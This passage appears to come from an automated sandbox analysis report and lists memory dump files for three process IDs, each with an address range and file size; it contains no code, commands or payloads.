                                                                                                                                                            Filesize

                                                                                                                                                            1.9MB

                                                                                                                                                          • memory/4276-181-0x00007FFFEF940000-0x00007FFFEF9EE000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            696KB

                                                                                                                                                          • memory/4276-139-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4276-136-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/4276-194-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.9MB

                                                                                                                                                          • memory/4276-189-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4276-195-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4276-199-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/4276-196-0x00007FFFEF940000-0x00007FFFEF9EE000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            696KB

                                                                                                                                                          • memory/4276-188-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/4276-179-0x000001BB4EB50000-0x000001BB4EB90000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            256KB

                                                                                                                                                          • memory/4864-100-0x00007FF75E1D0000-0x00007FF75E498000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.8MB

                                                                                                                                                          • memory/4864-0-0x00007FF75E1D0000-0x00007FF75E498000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.8MB

                                                                                                                                                          • memory/5112-162-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/5112-104-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/5112-112-0x000002007ADA0000-0x000002007ADB0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/5112-113-0x000002007ADA0000-0x000002007ADB0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/5112-150-0x000002007ADA0000-0x000002007ADB0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB